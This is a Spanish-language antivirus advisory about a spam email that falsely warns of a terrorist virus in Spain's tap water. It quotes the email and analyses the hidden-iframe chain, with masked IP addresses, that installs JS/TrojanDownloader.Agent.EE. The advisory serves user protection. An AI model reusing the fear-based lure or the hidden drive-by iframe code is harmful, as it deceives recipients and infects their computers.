Virus Intoxica Agua potable en Espana, informamos
a los ciudadanos que no consuman agua ya que contiene
un virus debido a un acto terrorista.
Al momento no sabemos la gravedad del Incidente, si
sabemos que hay infectados por tomar AGUA INFECTADA
CON VIRUS !!
PARA MAS INFORMACION HAGA CLICK EN EL LINK .

http: // geocities.com/[nombre al azar]

Atte.
Ciudadania del Pueblo
Grupo Santander

------------------------------------------------------
Si recibio este mail por equivocacione, por favor
desuscribirse desde el siguiente link
unsubscribe from our mailing list:
http: // geocities.com/[nombre al azar]

Donde [nombre al azar] es una serie de caracteres y números generados al azar. El enlace suele ser siempre diferente.

Si el usuario hace clic en dicho enlace, se abre una página de Geocities conteniendo un iFrame oculto:

<iframe style='visibility: hidden;' width='1' height='1'
src='http: // 58.65.???.106 /1/'></iframe>

La dirección IP (apunta a un equipo ubicado en alguna parte de Hong Kong), contiene a su vez otra página que muestra un mensaje de error falso en su título (500 - Internal Server Error), y sin texto visible. Sin embargo, la página posee un segundo iFrame también oculto, dirigido a una segunda página en dicho servidor, la cuál contiene un código en JavaScript, que desde la base 2170 es detectado por NOD32 como JS/TrojanDownloader.Agent.EE:

<HTML><HEAD>
<TITLE>500 - Internal Server Error</TITLE></HEAD>
<BODY>
</TBODY>
<iFRAME NAME="member" width=0% height=0% scrolling="auto"
SRC="http: // 58.65.???.106 /1/ inde??.php">
</BODY></HTML>

La ejecución de JS/TrojanDownloader.Agent.EE se realiza de forma automática, culminando el proceso que se inició cuando el usuario hizo clic en el primer enlace recibido en el spam antes mencionado.

Si se vuelve a hacer clic sobre el enlace, el sitio rechaza la petición, basado en la dirección IP del usuario, lo que supone que no solo se utiliza un control para evitar una nueva infección, sino que se colecciona la lista de direcciones IP de las víctimas. El mensaje mostrado en ese caso es el siguiente:

Sorry! You IP is blocked.

Si bien lo aquí descrito puede servir de advertencia, recordemos que los escenarios involucrados en este tipo de ataque (textos de los mensajes, enlaces y páginas web, troyanos descargados, etc.), pueden variar fácilmente, y de hecho seguramente lo harán en el transcurso de las próximas horas.

Una vez más, recordamos que la curiosidad siempre juega en nuestra contra, y que hoy más que nunca es imprescindible no hacer clic sobre enlaces de ningún correo que no hayamos solicitado, así como tampoco abrir adjuntos que no hemos pedido, sin que en ningún caso importe en absoluto su remitente.

Por supuesto, esa conducta debe estar complementada con la norma de utilizar siempre un antivirus actualizado, y haber instalado todos los parches publicados por los fabricantes para nuestro sistema operativo y programas utilizados.


Relacionados:

TrojanDownloader.Agent.EE. Descarga otros troyanos
http://www.vsantivirus.com/trojandownloader-agent-ee.htm


(*) Jose Luis Lopez es el responsable de contenidos de VSAntivirus.com, y director ejecutivo de ESET NOD32 Uruguay.






(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com